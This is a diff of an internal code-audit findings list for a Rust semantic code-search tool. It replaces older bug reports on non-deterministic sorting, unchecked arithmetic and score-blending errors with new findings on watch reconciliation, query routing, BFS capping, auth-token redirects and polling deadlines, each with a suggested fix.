-      queue.push_back((Arc::from(name.as_str()), 0));
-  }
-  while let Some((name, depth)) = queue.pop_front() {
-      // ...
-      if name_scores.len() >= opts.max_expanded_nodes && visited.len() > initial_size {
-          expansion_capped = true;
-          break;
-      }
-      // expand neighbors
-  }
-  ```
-  `name_scores` is a `HashMap<String, ...>`, so `name_scores.keys()` iterates in seed-randomized order. When the BFS hits `max_expanded_nodes` mid-expansion (common on dense graphs — default `max_expanded_nodes` = 50 for onboard callers BFS, see `src/onboard.rs:165`), which seeds got expanded and which got cut off depends entirely on which order the iterator handed them out. Different runs of `cqs gather`, `cqs task`, `cqs onboard` on the same corpus/query produce different expanded graphs, different score maps, different final chunk lists after dedup+truncate. This is exactly the class of non-determinism the v1.25.0 tie-break sweep targeted, but it sits one layer up in the pipeline (BFS graph seeding, not result sorting).
-- **Suggested fix:** Enqueue seeds in a deterministic order — easiest is a sort by `(initial_score desc, name asc)` before push:
-  ```rust
-  let mut seeds: Vec<(&String, (f32, usize))> =
-      name_scores.iter().map(|(k, v)| (k, *v)).collect();
-  seeds.sort_by(|a, b| {
-      b.1.0.total_cmp(&a.1.0)               // higher score first
-          .then_with(|| a.0.cmp(b.0))        // tie on name asc
-  });
-  for (name, _) in seeds {
-      queue.push_back((Arc::from(name.as_str()), 0));
-  }
-  ```
-  This respects the "process higher-scoring seeds first" intent (the old code happened to do this only by coincidence of HashMap hashing), and makes the cap-at-50 cutoff deterministic. Add a test that seeds two equally-scored entries, caps at a small `max_expanded_nodes`, and asserts the same `name_scores` on 100 re-runs.
-
-#### `llm::summary::contrastive_neighbors` top-K selection sorts by score alone — non-deterministic neighbor choice when similarities tie
-- **Difficulty:** easy
-- **Location:** `src/llm/summary.rs:263,265,267`
-- **Description:** Three sibling sorts all use `b.1.total_cmp(&a.1)` with no tie-break:
-  ```rust
-  candidates.sort_unstable_by(|a, b| b.1.total_cmp(&a.1));           // line 263
-  candidates.select_nth_unstable_by(limit - 1, |a, b| b.1.total_cmp(&a.1));  // line 265
-  candidates.truncate(limit);
-  candidates.sort_unstable_by(|a, b| b.1.total_cmp(&a.1));           // line 267
-  ```
-  `candidates` is `Vec<(usize, f32)>` where `usize` is an index into `valid_owned`. When multiple candidates have identical similarity (common at low precision — f32 embeddings clamp to the same bit pattern for very close vectors, especially for L2-normalized embeddings over the same reindex cohort), `select_nth_unstable` can pick any of them, and the final neighbor set for a given seed is non-deterministic. This propagates into the prompt sent to the LLM for contrastive summary generation, so the *same* corpus + *same* seed chunk produces different summaries on different runs. Contrastive summary caching by content_hash then either caches the first random result forever (good) or wastes Batches API credits regenerating when the cache misses (bad — ~$0.38/run Haiku).
-- **Suggested fix:** All three sort calls need the index as a secondary key. `candidates: Vec<(usize, f32)>` already carries the index:
-  ```rust
-  candidates.sort_unstable_by(|a, b| b.1.total_cmp(&a.1).then(a.0.cmp(&b.0)));
-  candidates.select_nth_unstable_by(limit - 1, |a, b| b.1.total_cmp(&a.1).then(a.0.cmp(&b.0)));
-  candidates.truncate(limit);
-  candidates.sort_unstable_by(|a, b| b.1.total_cmp(&a.1).then(a.0.cmp(&b.0)));
-  ```
-  Same cascade the rest of the codebase applies everywhere else.
-
-#### `--name-boost` CLI arg accepts negative / >1 values — negative embedding weight, out-of-range fusion
-- **Difficulty:** easy
-- **Location:** `src/cli/args.rs:57-58` (arg declaration); `src/search/scoring/candidate.rs:286` (consumer)
-- **Description:** CLI argument validation:
-  ```rust
-  #[arg(long, default_value = "0.2", value_parser = parse_finite_f32)]
-  pub name_boost: f32,
-  ```
-  `parse_finite_f32` only rejects NaN/Infinity; any other `f32` value passes through. Consumer in `apply_scoring_pipeline`:
-  ```rust
-  (1.0 - ctx.filter.name_boost) * embedding_score + ctx.filter.name_boost * name_score
-  ```
-  A user calling `cqs search "foo" --name-boost 5.0` gets `(1.0 - 5.0) * embedding = -4.0 * embedding_score`, i.e., the embedding signal is **negated** — identical semantic matches get ranked last. Symmetrically, `--name-boost -1.0` gives `2.0 * embedding - 1.0 * name_score`, over-weighting embedding past its natural [0,1] range. The `.clamp(0.0, 1.0)` that the config-file path applies at `src/config.rs:370-371` is not mirrored on the CLI-flag path, so a config that looked safe can be overridden into a search-breaking regime via a stray flag. Most eval scripts set `--name-boost` explicitly, so a typo is one `bash` run away.
-- **Suggested fix:** Replace the argument parser with a clamped variant. Either add a helper:
-  ```rust
-  fn parse_name_boost(s: &str) -> std::result::Result<f32, String> {
-      let v = parse_finite_f32(s)?;
-      if (0.0..=1.0).contains(&v) { Ok(v) } else {
-          Err(format!("name_boost must be in [0.0, 1.0], got {v}"))
-      }
-  }
-  ```
-  and use `value_parser = parse_name_boost` at line 57. Or enforce the clamp at `SearchFilter` construction so config and CLI paths converge. Same fix applies to any other weight/threshold-style f32 flag.
-
-#### `reranker::compute_scores_opt` — `batch_size * stride` unchecked multiplication hides shape errors; `data[i * stride]` can panic on overflow
-- **Difficulty:** easy
-- **Location:** `src/reranker.rs:368-387`
-- **Description:**
-  ```rust
-  let stride = if shape.len() == 2 { shape[1] as usize } else { 1 };
-  if stride == 0 { /* return error */ }
-  let expected_len = batch_size * stride;              // <-- unchecked mul
-  if data.len() < expected_len { /* return error */ }
-  let scores: Vec<f32> = (0..batch_size).map(|i| sigmoid(data[i * stride])).collect();
-  ```
-  `shape[1]` is `i64` from ORT. The zero-guard landed after the prior audit (RB-8) but the negative-dim and overflow guards are still missing:
-  - `shape[1] = -1` → `(-1_i64 as usize) = usize::MAX` (on 64-bit).
-  - `batch_size * usize::MAX` wraps to a small value; `data.len() < expected_len` passes with that small wrapped value.
-  - Inside the loop, `i * stride` also wraps, indexing `data` at an arbitrary position. If the wrapped index exceeds `data.len()`, **Rust bounds-checks and panics** in the middle of a hot inference call — aborting the entire search pipeline.
-  A malicious / corrupted ONNX file (or a new reranker with an unusual output tensor layout) is the reachable source of a negative or pathologically-large `shape[1]`.
-- **Suggested fix:** Guard the cast and the multiply:
-  ```rust
-  if shape.len() == 2 && shape[1] <= 0 {
-      return Err(RerankerError::Inference(format!(
-          "reranker output has non-positive dim 1: {}", shape[1]
-      )));
-  }
-  let stride = if shape.len() == 2 { shape[1] as usize } else { 1 };
-  if stride == 0 { /* existing error */ }
-  let expected_len = batch_size.checked_mul(stride).ok_or_else(|| {
-      RerankerError::Inference(format!(
-          "reranker expected_len overflows: batch_size={batch_size} stride={stride}"
-      ))
-  })?;
-  if data.len() < expected_len { /* existing error */ }
-  ```
-  Same pattern fixes the SPLADE six-site parallel in `splade/mod.rs` (see prior audit RB-9). The `data[i * stride]` indexing can stay as-is once the upstream `expected_len` check is sound.
-
-#### `llm::doc_comments::select_uncached` sort has no tie-break beyond content length — non-deterministic selection when `max_docs` truncates
-- **Difficulty:** easy
-- **Location:** `src/llm/doc_comments.rs:222-229,242`
-- **Description:**
-  ```rust
-  uncached.sort_by(|a, b| {
-      let a_no_doc = a.doc.as_ref().is_none_or(|d| d.trim().is_empty());
-      let b_no_doc = b.doc.as_ref().is_none_or(|d| d.trim().is_empty());
-      b_no_doc.cmp(&a_no_doc)
-          .then_with(|| b.content.len().cmp(&a.content.len()))
-  });
-  // ...
-  uncached.truncate(uncached_cap);
-  ```
-  Two chunks with the same `has-doc` status and the same content-length byte count collide on the compare; `sort_by` is stable w.r.t. the input `uncached` vec's order, which is fed by a DB scan that may return duplicates-by-size in any order depending on index layout. When `--improve-docs --max-docs N` trips the truncate (line 242), which rows get documented vs skipped is non-deterministic across runs. For a Claude Batches API call (≈ $0.38 / run Haiku), that means the set of chunks that eat budget is non-reproducible. Between the enrichment re-run and the contrastive-summaries batcher this is the third "tie-break missing" site in `llm/*.rs`.
-- **Suggested fix:** Append a stable tertiary key — chunk id is always unique and carried by `ChunkSummary`:
-  ```rust
-  .then_with(|| b.content.len().cmp(&a.content.len()))
-  .then_with(|| a.id.cmp(&b.id))
-  ```
-
-#### `token_pack` breaks on first oversized item — drops smaller items that would fit, undershoots budget
-- **Difficulty:** easy
-- **Location:** `src/cli/commands/mod.rs:398-417` (greedy loop in `token_pack`)
-- **Description:** The greedy knapsack loop treats budget overflow as a hard stop:
-  ```rust
-  for idx in order {
-      let tokens = token_counts[idx] + json_overhead_per_item;
-      if used + tokens > budget && kept_any {
-          break;          // <-- should be `continue;`
-      }
-      // ...
-      used += tokens;
-      keep[idx] = true;
-  }
-  ```
-  Once a single item fails to fit, the loop exits — every lower-scored item is dropped, even items that would comfortably fit in the remaining budget. Concrete repro: budget = 300, items sorted by score descending = `[A=250 tokens, B=100 tokens, C=40 tokens]`. After `A` is packed (used=250), `B` fails (`350 > 300`) → `break` → `C` is silently dropped, even though `used + 40 = 290 ≤ 300`. With `continue`, `C` would land in the result and the function would return `(2 items, 290 tokens)` instead of `(1 item, 250 tokens)`. Hits every consumer of `--tokens` — `cqs context`, `cqs explain`, `cqs scout`, `cqs gather`, `cqs task`, the CLI/batch search packers, etc. — under the realistic mix where one large chunk is followed by smaller chunks in the score-ordered list. Particularly bad for code search where high-relevance fixtures (whole modules) often outweigh the per-symbol chunks that would otherwise round out the response.
-- **Suggested fix:** Replace `break` with `continue` so the loop keeps probing for fits, and drop the now-redundant `kept_any` short-circuit on the break (the `kept_any && tokens > budget` check is still needed for the "include at least one" branch). Add a regression test with score-sorted items `[oversized, fits, fits]` asserting the two `fits` survive.
-
-#### `map_hunks_to_functions` returns hunks in HashMap iteration order — non-deterministic `cqs impact-diff` JSON across runs
-- **Difficulty:** easy
-- **Location:** `src/impact/diff.rs:38-106` (`map_hunks_to_functions` outer loop), and the downstream truncation at `src/impact/diff.rs:154-168`
-- **Description:** Two layered determinism bugs in the diff-impact pipeline:
-  1. `by_file: HashMap<&Path, Vec<&DiffHunk>>` is iterated at line 66 (`for (file, file_hunks) in &by_file`). HashMap iteration is process-seed-randomized, so the order of `functions: Vec<ChangedFunction>` produced is run-to-run random for any diff that touches more than one file.
-  2. The `analyze_diff_impact_with_graph` cap at line 165 uses `changed.into_iter().take(cap)` (default cap = 500). When the input exceeds 500 functions, *which* 500 survive depends on the random Vec order from step 1 — so on a real "big refactor" diff (>500 changed functions), `cqs impact-diff` output is nondeterministically truncated. Two runs against the same diff give different `changed_functions`, different caller batches, different reverse-BFS results, different test sets, different `via` attributions.
-- **Suggested fix:** Sort `changed` by `(file_path, line_start, name)` after `map_hunks_to_functions` builds it, before the cap takes effect:
-  ```rust
-  let mut changed = map_hunks_to_functions(...);
-  changed.sort_by(|a, b| {
-      a.file.cmp(&b.file)
-          .then(a.line_start.cmp(&b.line_start))
-          .then(a.name.cmp(&b.name))
-      });
-  ```
-  Or build `by_file` as a `BTreeMap`/`Vec<(&Path, …)>` sorted by path. Add a regression test with a diff spanning 3 files and assert `functions` is identical across 100 calls.
-
-#### `drain_pending_rebuild` dedup against rebuild-thread snapshot drops fresh embeddings for chunks whose content changed during the rebuild window
+#### AC-V1.30.1-1: `run_daemon_reconcile` strict `disk > stored` mtime predicate misses git-checkout-to-older-commit
 - **Difficulty:** medium
-- **Location:** `src/cli/watch.rs:1077-1105` (`drain_pending_rebuild`, the `known` filter)
-- **Description:** The non-blocking HNSW rebuild added in #1113 streams a snapshot of `(id, embedding)` from a read-only Store handle in a worker thread, while the watch loop continues capturing newly upserted `(id, embedding)` pairs into `pending.delta`. On swap, the code dedups via:
-  ```rust
-  let known: HashSet<&str> = new_index.ids().iter().map(String::as_str).collect();
-  let to_replay: Vec<(String, Embedding)> = pending.delta
-      .into_iter()
-      .filter(|(id, _)| !known.contains(id.as_str()))
-      .collect();
-  ```
-  `known` contains every chunk id the rebuild thread saw at its snapshot moment. If the watch loop *re-embedded* a chunk during the rebuild window (file edit while rebuild was in flight — exactly the case the non-blocking rebuild was added to handle), the new `(id, Embedding)` pair lands in `pending.delta`, but `known` already contains the id with the *old* embedding. The filter drops the fresh embedding, and the swapped-in HNSW carries the stale vector until the next threshold rebuild. For an editor save loop this means up to 100 saves' worth of stale vectors against the freshly-modified file, exactly defeating the rebuild's purpose. Search for the modified file returns hits on the pre-edit content.
-- **Suggested fix:** Dedup must compare the embedding payload, not just the id. Cleanest: have the rebuild thread return `Vec<(String, blake3_hash)>` alongside the index, and replay any delta whose `(id, hash)` differs from the snapshot. Cheaper alternative: use the chunk's `content_hash` from the store at delta-capture time — `pending.delta` becomes `Vec<(String, Embedding, ContentHash)>`, and the dedup filter checks the content hash matches the rebuilt vector's hash. Add a test that mid-rebuild-window upserts of an existing id produce the *new* embedding in the swapped-in index.
+- **Location:** src/cli/watch/reconcile.rs:124
+- **Description:** The reconcile predicate is `(stored, disk) => disk > *stored`. Reconcile is the layer-2 safety net for bulk git operations the inotify path misses (the module's own docstring at line 7-9 calls out `git checkout` / `reset --hard` / `merge` as the motivating cases). But `git checkout` of a sibling branch restores file mtimes to their **commit time** — which can easily be *older* than the indexed `source_mtime`. Concrete repro: index file `foo.rs` at HEAD (mtime = now), then `git checkout HEAD~5 -- foo.rs` where the file's HEAD~5 commit is from last week. Disk content is now different, but `disk_mtime (last week) <= stored_mtime (now)`, so reconcile classifies the file as "fine" and skips it. The inotify event-driven path also uses `mtime <= last` (events.rs:100) so the file is silently stale until either `cqs index --force` or the file is touched again. The bulk-delta acceptance test at line 304 only exercises *forward*-mtime cases, missing this asymmetry.
+- **Suggested fix:** Reconcile should compare on a content fingerprint, not just mtime, when mtime is non-monotonic. Cheapest path: reuse the existing `content_hash` already stored per chunk — when `disk_mtime != stored_mtime` (in either direction), open the file and hash it; only skip if the file's hash matches the indexed chunk's content hash. Alternative: store a `(mtime, size)` tuple and treat any difference (not just mtime forward) as "queue for reindex". Add a regression test seeding `stored_mtime = now`, then writing the file with `utime` set to `now - 1 day`, asserting reconcile queues it.
 
-#### `search_reference` weighted threshold filters using post-weight comparison but pre-weight `limit` — multi-ref ranking truncates valid candidates
+#### AC-V1.30.1-2: `is_structural_query` keyword match is case-sensitive — capitalised structural terms misroute to Conceptual
 - **Difficulty:** easy
-- **Location:** `src/reference.rs:231-258` (`search_reference`, `apply_weight = true` branch)
-- **Description:** The flow is:
-  ```rust
-  let mut results = ref_idx.store.search_filtered_with_index(
-      query_embedding, filter, limit, threshold, ref_idx.index.as_deref(),
-  )?;
-  if apply_weight {
-      for r in &mut results { r.score *= ref_idx.weight; }
-      results.retain(|r| r.score >= threshold);
-  }
-  ```
-  Two coupled algorithm bugs:
-  1. `search_filtered_with_index` is asked for the top `limit` results that satisfy `score ≥ threshold`. With `weight = 0.8` and a `threshold = 0.5`, a chunk that scored 0.62 (above raw threshold) will pass into `results`, then become 0.50 after `*= weight`. A chunk that scored 0.40 (below raw threshold) is dropped by the underlying search — but `0.40 * 1/weight = 0.50` would have been the boundary. The reference therefore *systematically* under-samples its own corpus when `weight < 1.0`: the underlying top-`limit` cap is computed against unweighted scores, missing valid post-weight survivors.
-  2. The post-weight `retain` then re-applies the same `threshold` on weighted scores, double-filtering: a 0.51 raw score (passes raw threshold) becomes 0.408 weighted (fails weighted threshold), so it's dropped *after* the underlying search already spent the cycle on it. The user pays for the search but gets a smaller result set than `limit` even when more candidates exist.
-- **Suggested fix:** When `apply_weight` is true, query the underlying store with a relaxed threshold (`threshold / weight` for weight > 0) and an over-fetch limit, then weight + filter + sort + truncate to `limit` in caller-side code:
-  ```rust
-  let raw_threshold = if apply_weight && ref_idx.weight > 0.0 {
-      threshold / ref_idx.weight
-  } else { threshold };
-  let raw_limit = if apply_weight {
-      // 2x or 3x over-fetch leaves headroom for the weighted retain step
-      (limit as f32 * 2.0).ceil() as usize
-  } else { limit };
-  let mut results = ref_idx.store.search_filtered_with_index(
-      query_embedding, filter, raw_limit, raw_threshold, ref_idx.index.as_deref())?;
-  if apply_weight {
-      for r in &mut results { r.score *= ref_idx.weight; }
-      results.retain(|r| r.score >= threshold);
-      results.sort_by(|a, b| b.score.total_cmp(&a.score).then(a.chunk.id.cmp(&b.chunk.id)));
-      results.truncate(limit);
-  }
-  ```
-  Same fix shape applies to `search_reference_by_name` at line 265-285 (which has the threshold-then-weight ordering inverted, hiding the same bug).
+- **Location:** src/search/router.rs:813-816
+- **Description:** `is_structural_query` splits on whitespace and compares words to `STRUCTURAL_KEYWORDS` (`struct`, `enum`, `trait`, `impl`, `interface`, `class`, `module`, `namespace`, `protocol`, `type`) with `w == kw` — exact bytewise equality. Queries like `"Trait Iterator"`, `"Class Foo"`, `"Find all Structs"`, or any sentence-cased query starting with a capitalised keyword fail the predicate. P2.44 (already triaged) fixed the *position*-sensitivity bug ("end-of-query keyword misses"), but the *case*-sensitivity sibling is still open. Effect: queries that are unambiguously structural in intent route to Conceptual (α=0.70) instead of Structural (α=0.90), measurably hurting R@5 on capitalised-noun queries. Agents that compose queries from a UI title bar ("Class Hierarchy") are particularly affected. The rest of the router (e.g. `is_behavioral_query`'s phrase probes) appears similarly case-sensitive.
+- **Suggested fix:** Lowercase the query once at the top of `classify_query_inner` and pass a normalised &str through both the regex probes and keyword-word loop. The structural keywords are already all-lowercase constants, so equality holds after the normalisation. Add a regression-pin test alongside the existing `test_p2_44_*` that asserts `"Class Foo"`, `"Trait Iterator"`, `"FIND ALL STRUCTS"` all classify as Structural.
 
-#### `find_type_overlap` chunk_info dedup picks `(file, line)` from random HashMap iteration — non-deterministic `cqs related` per-result file attribution
-- **Difficulty:** easy
-- **Location:** `src/related.rs:131-147` (build of `chunk_info`); `src/related.rs:155-157` (final sort, no tie-break on name)
-- **Description:** Two algorithm bugs in the same loop:
-  1. `chunk_info: HashMap<String, (PathBuf, u32)>` uses `or_insert(...)` to remember the first `(file, line)` seen for each function name. The outer iteration `for chunks in results.values()` walks `results: HashMap<String, Vec<ChunkSummary>>` in process-seed-random order. When a function name appears across multiple type result lists (common — a function uses several types and so shows up in each type's user list), the `or_insert` retains the first arrival, which depends on which type's bucket happens to be first in the random iteration. For a function defined in one file but with overloads or test fixtures in another, the result row's `file` field flips run-to-run.
-  2. The final sort at line 155-157 is `sorted.sort_by_key(|e| Reverse(e.1))` (count only) followed by `truncate(limit)`. Counts in this domain are tiny integers (1, 2, 3) and equal counts are the rule, not the exception. Truncate then picks arbitrary names from a HashMap-ordered Vec.
-  3. Earlier at line 59-65, `type_names` is computed via `HashSet → into_iter().collect::<Vec>()` — also random order — though this only affects bind ordering downstream, not result identity.
-  Net effect: `cqs related <fn>` returns different `shared_types` lists across runs, with different `(file, line)` attribution per result. Defeats `cqs related <fn>` reproducibility for evals or cached agent prompts.
-- **Suggested fix:** (a) Sort `type_counts.into_iter()` results into a deterministic Vec before the count-sort: `sorted.sort_by(|a, b| Reverse(a.1).cmp(&Reverse(b.1)).then(a.0.cmp(&b.0)))` so equal counts break by name asc. (b) For `chunk_info`, walk `results` in sorted-by-key order so the first `or_insert` is deterministic — or store *all* `(file, line)` candidates per name and pick `min` by `(file, line)` after the loop. (c) Convert the HashSet collect at line 63-65 into a sort: `let mut type_names: Vec<_> = ...; type_names.sort(); type_names.dedup();`.
-
-#### CAGRA `search_with_filter` silently under-fills when `included < k` — caller cannot distinguish "few matching candidates" from "filter too restrictive"
+#### AC-V1.30.1-3: BFS `bfs_expand` cap check misses the per-neighbor inner break, leaving `expansion_capped` false on edge boundary
 - **Difficulty:** medium
-- **Location:** `src/cagra.rs:520-598` (`search_with_filter`); `src/cagra.rs:344-486` (`search_impl`)
-- **Description:** When the caller asks for `k` results filtered by a predicate, the bitset path does:
-  ```rust
-  let mut included = 0usize;
-  for (i, id) in self.id_map.iter().enumerate() {
-      if filter(id) { bitset[i / 32] |= 1u32 << (i % 32); included += 1; }
-  }
-  if included == n { return CagraIndex::search(self, query, k); }
-  if included == 0 { return Vec::new(); }
-  // else: ask CAGRA for k — but only `included` slots can ever be filled
-  ```
-  When `included < k` (e.g., `cqs search "foo" --include-type Function --lang rust` over a corpus where the Function/Rust subset has 12 vectors but `k = 20`), CAGRA receives `topk = 20` and writes valid `(neighbor, distance)` pairs into the first `included` slots; the remaining `k - included` slots stay at the `INVALID_DISTANCE` sentinel. The `!dist.is_finite()` check at line 473 correctly drops those slots, but the caller above this layer (e.g., `Store::search_filtered_with_index`) sees `Vec<IndexResult>` of length `min(included, k)` with no signal that under-fill happened. Downstream paging / pagination logic that assumes "got fewer than k → end of results" is correct, but a user who set `--limit 20` and gets 12 has no way to distinguish "this filter combination has only 12 hits" from "CAGRA itopk_size cap silently truncated".
+- **Location:** src/gather.rs:357-381
+- **Description:** Outer-loop cap check (line 345) and inner per-neighbor cap check (line 357) both set `expansion_capped = true`, but the *inner* `break` only exits the `for neighbor in neighbors` loop. The post-loop `if expansion_capped { break; }` (line 379) catches it for the outer queue loop. So far so good. But the **inner** check at line 357 fires *before* the `visited.contains(&neighbor)` test — so when the cap is reached mid-neighbor-expansion, the rest of the neighbors of the current node are dropped without giving an "already-visited" neighbor a chance to bump its score (the `existing.0 = new_score` branch at line 373). Effect: when the cap fires partway through a high-fanout node's neighbors, downstream nodes that *would* have had their `(score, depth)` bumped to a higher score keep their stale lower score. The post-expansion sort then under-weights those nodes. Determinism is preserved (the seed-sort + cap is stable), but the cap silently degrades the *quality* of the expansion at the boundary, not just truncating it.
+- **Suggested fix:** Move the cap check to *after* the score-bump branch so already-visited neighbors still get their best-score update even when the cap is reached. Concretely: inside the for-loop, do `if !visited.contains(...) { ...insert with cap check... } else { ...always do the score bump, no cap check... }`. The cap is on `name_scores.len()`, not on score updates, so the relaxation is sound. Add a test where two seeds expand into a shared third node and the cap fires between them — the shared node should end up with the higher of the two scores, not whichever the BFS reached first.
 
-  Worse, when `included < k` AND `k > itopk_max` (#988 reported `itopk_size_max=480` while `k=500` failed), CAGRA returns an error from `gpu.index.search(...)` and `search_impl` logs at error then returns `Vec::new()` — silently zeroing out a query that, with `k = included`, would have succeeded. The path doesn't try a fallback with `k = included.min(k)`.
-- **Suggested fix:** Cap `k` at `included` before invoking `search_impl` so CAGRA is always asked for a feasible top-K:
-  ```rust
-  let effective_k = k.min(included);
-  // … then
-  self.search_impl(&gpu, query, effective_k, Some(&bitset_device))
-  ```
-  Add a debug log when `effective_k < k` so eval scripts can see the truncation. As a follow-on, `search_filtered_with_index` should propagate a `degraded` / `truncated` boolean upward when the underlying index returned `< k` results so that the JSON envelope can carry it (matches the pattern used in `analyze_diff_impact_with_graph` for `truncated: bool`).
+#### AC-V1.30.1-4: `process_file_changes` resets `dropped_this_cycle` BEFORE embedder availability check — drops on embedder failure are silently lost
+- **Difficulty:** medium
+- **Location:** src/cli/watch/events.rs:139-156
+- **Description:** Line 145 sets `state.dropped_this_cycle = 0` unconditionally before the function attempts `try_init_embedder` at line 154. If the embedder can't be initialised (line 156 `return`), the function exits leaving `pending_files` drained at line 132 (already gone) AND `dropped_this_cycle` zeroed, having processed no chunks. The subsequent snapshot publish reports `dropped_this_cycle = 0` while events from this cycle's drops are permanently lost. The watch loop will retry next cycle (because `pending_files` re-fills), but the *signal* that drops happened is gone — `cqs status --watch-fresh` and the `delta_saturated`-style operator log line never fire for the lost drops. This is adjacent to the already-reported "dropped_this_cycle reset before snapshot publish" finding, but the failure mode there was timing; this one is total signal loss when embedder initialization fails.
+- **Suggested fix:** Move the `dropped_this_cycle = 0` reset to *after* the embedder-availability check. If `try_init_embedder` returns `None`, leave the counter alone — the next cycle's snapshot still surfaces the drop count, and the operator sees the truthful "events were dropped AND embedder is offline" state. Better yet: bookkeep a `dropped_pending_publish` field separate from `dropped_this_cycle` so the snapshot publish always sees an accurate figure regardless of reindex success.
 
-#### Hybrid SPLADE fusion: `alpha == 0` branch produces unbounded `1.0 + s` scores that mix into a [-1, 1] cosine pool — magic-constant cliff at the SPLADE boundary
+#### AC-V1.30.1-5: `check_request` ambiguous-channel preference: cookie wins over query, leaks stale `?token=` in URL bar
 - **Difficulty:** easy
-- **Location:** `src/search/query.rs:649-672` (the fusion lambda inside `splade_fuse_with_dense`)
-- **Description:** The `alpha <= 0.0` branch ("pure re-rank mode") emits:
-  ```rust
-  let score = if alpha <= 0.0 {
-      if s > 0.0 { 1.0 + s } else { d }
-  } else {
-      alpha * d + (1.0 - alpha) * s
-  };
-  ```
-  - `s` is normalized to `[0, 1]` by dividing by `max_sparse` (line 614), but `1.0 + s` is in `[1.0, 2.0]`.
-  - `d` (dense cosine) is in `[-1, 1]` (`cosine_similarity` is not clamped here — `apply_scoring_pipeline`'s `.max(0.0)` runs *later*, after this fusion).
-  - A SPLADE-found chunk with `s = 0.001` (barely-there sparse signal — possible when its single shared subword token barely fires) gets `1.0 + 0.001 = 1.001`, which beats *every* SPLADE-unknown chunk regardless of how relevant they are by dense cosine (best possible 1.0 unclamped).
-  - A SPLADE-found chunk with `s = 0` is *not* in `sparse_scores` because `sparse_scores.insert(&r.id, normalized)` runs even when `normalized = 0` only if the source had `r.score > 0` upstream — confirmed (and `max_sparse > 0` gate at line 614). So the `s > 0` test does what it says, but the cliff at the threshold (any positive sparse hit, no matter how small, dominates dense) is a hidden gotcha. Real-world impact: setting `--alpha 0` (re-rank mode) inverts the result list when a sparse-only weak match exists.
-- **Suggested fix:** Use a calibrated additive boost rather than a magic constant — e.g., `let boost = 1.0 + s * 0.1;` would still place SPLADE-found chunks above any non-found candidate while preserving their dense ordering relative to each other within the boost band. Or, as the cleaner option, treat `alpha == 0` symmetrically with the linear path: `0.0 * d + 1.0 * s = s`, and rely on an `s > d` post-filter to bias toward sparse hits. Either way, drop the `1.0 + s` magic constant — it inflates SPLADE matches into a band the dense path can never reach. Add a doc-test repro: dense pool `[(A, 0.95)]`, sparse pool `[(B, 0.001 normalized)]`, `alpha = 0.0` → expect `A` first, but the current code returns `[B, A]` with `B@1.001`.
+- **Location:** src/serve/auth.rs:269-321
+- **Description:** When a request arrives with BOTH a valid `cqs_token_<port>` cookie AND a `?token=<value>` query parameter (regardless of whether the query value is correct), the cookie path matches first and returns `AuthOutcome::Ok` — the redirect handler at line 360 (which strips the query token) is never reached. Effect: a user who bookmarks a URL with `?token=…` and later loads it on a tab that already has the auth cookie keeps the token in the URL bar permanently. This is exactly the SEC-7 leakage path the redirect mechanism was designed to close. The intended invariant ("token in URL → set cookie, redirect to clean URL") fails when a stale URL is reloaded. Test surface gap: every existing `check_request` test either uses ONE channel or pairs Bearer with cookie — none exercise "valid cookie + redundant query" to assert the redirect fires.
+- **Suggested fix:** Reorder to check for `?token=` *first*; if present, validate it, set the cookie, and redirect — regardless of whether a cookie is also present. The cookie is a server-set HttpOnly + SameSite=Strict marker; trust it but strip the query param so the URL bar stops carrying live token material. Alternatively, after a successful Ok via cookie/Bearer, sniff for a `?token=` param and issue a redirect to strip it (without re-validating). Add a test: build a request with a valid cookie AND `?token=anything` → expect 302 to the clean URL.
 
-#### `apply_scoring_pipeline` / hybrid path drops embedding-score sign without clamping — negative cosine inflates negatives via `name_boost` sign-flip
+#### AC-V1.30.1-6: `wait_for_fresh` deadline math allows one over-budget poll on a slow daemon
 - **Difficulty:** easy
-- **Location:** `src/search/scoring/candidate.rs:283-298` (the `(1.0 - name_boost) * embedding_score + name_boost * name_score` blend)
-- **Description:**
-  ```rust
-  let base_score = if let Some(matcher) = ctx.name_matcher {
-      let n = name.unwrap_or("");
-      let name_score = matcher.score(n);
-      (1.0 - ctx.filter.name_boost) * embedding_score + ctx.filter.name_boost * name_score
-  } else { embedding_score };
-  // …
-  let mut score = base_score.max(0.0) * ctx.note_index.boost(file_part, chunk_name);
-  ```
-  `embedding_score` here is raw cosine which is in `[-1, 1]` for un-normalized or oddly-normalized vectors and even for unit-norm vectors when the chunk and query are anti-correlated. The blend `(1 - nb) * e + nb * ns` with `e = -0.3, ns = 0.0, nb = 0.2` produces `-0.24`. The subsequent `.max(0.0)` clamps to `0.0`, which then misses the `score >= threshold` test (`threshold` defaults > 0). So far so good for the negative case.
-  But when `name_boost > 1` is supplied (CLI accepts arbitrary finite `f32`, see the still-pending AC-V1.29-5 from triage), `(1 - nb)` is negative, multiplying `e = 0.9` (a great match) by `-0.5` and adding `nb * ns`. The `.max(0.0)` then turns this into `0.0`, silently demoting good matches to zero. Net effect: an out-of-range `--name-boost` flag does not just mis-weight — it deletes good results. Compounds with the same finding in the existing scratch (#5).
-- **Suggested fix:** Clamp `name_boost` to `[0.0, 1.0]` at `SearchFilter` construction (single fix point that closes both the CLI and config paths), and clamp `embedding_score` to `[0.0, 1.0]` *before* the blend so the linear interpolation is always between two numbers in the same range and never produces a sign-flip:
-  ```rust
-  let embedding_score = embedding_score.clamp(0.0, 1.0);
-  let nb = ctx.filter.name_boost.clamp(0.0, 1.0);
-  let base_score = if let Some(matcher) = ctx.name_matcher {
-      let name_score = matcher.score(name.unwrap_or(""));
-      (1.0 - nb) * embedding_score + nb * name_score
-  } else { embedding_score };
-  ```
-  Add a property test asserting `apply_scoring_pipeline` output ∈ `[0.0, ∞)` for *any* `name_boost`, `embedding_score`, `name_score` ∈ `f32::finite()`.
+- **Location:** src/daemon_translate.rs:660-679
+- **Description:** The polling loop is `poll → if fresh return → if now >= deadline return Timeout → sleep 250ms`. If `daemon_status` itself takes longer than `wait_secs` (e.g. on a slow / contended socket — `resolve_daemon_timeout_ms` defaults to 30s), the **first** poll can complete *after* the deadline yet still go through the not-fresh branch, then the deadline check trips. So the function can overshoot the budget by up to one daemon-timeout's worth (default 30s) on a heavily-loaded daemon, EVEN with `wait_secs = 0`. Caller (eval gate) sets a 600s budget which becomes effectively 600+30s = 630s. Not a correctness bug, but the docstring at line 646-648 promises "deadline of `wait_secs`" — the actual upper bound is `wait_secs + resolve_daemon_timeout_ms`. Adversarial test gap: a mock daemon that intentionally `thread::sleep(31_000)` before responding would surface this.
